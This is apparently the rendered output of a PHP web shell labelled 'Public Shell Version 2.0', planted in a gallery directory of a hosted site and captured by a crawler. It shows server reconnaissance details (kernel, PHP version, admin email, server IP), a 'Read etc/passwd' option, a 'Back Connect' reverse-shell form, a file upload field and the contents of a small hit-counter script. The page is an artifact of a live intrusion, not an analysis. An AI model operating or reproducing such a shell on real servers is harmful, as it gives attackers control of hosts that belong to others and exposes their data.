Public Sh


Uname : Linux ispc 6.2.16-3-pve #1 SMP PREEMPT_DYNAMIC PVE 6.2.16-3 (2023-06-17T05:58Z) x86_64
PHP Version : 5.2.6-1+lenny16
Server Admin : webmaster@zednictvi-stastny.eu
Server IP : 109.105.49.240 Your IP : 18.226.166.64
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source,highlight_file
Current Path : /var/www/clients/client49/web272/web/gallery/
File Upload :
Current File : /var/www/clients/client49/web272/web/gallery/stats.php

<?PHP
if (file_exists("counter.txt")){
   $f = fopen("counter.txt","r");         
   $num = fread($f,filesize("counter.txt"));
   fclose($f);
}
printf($num);
?>

Public Shell Version 2.0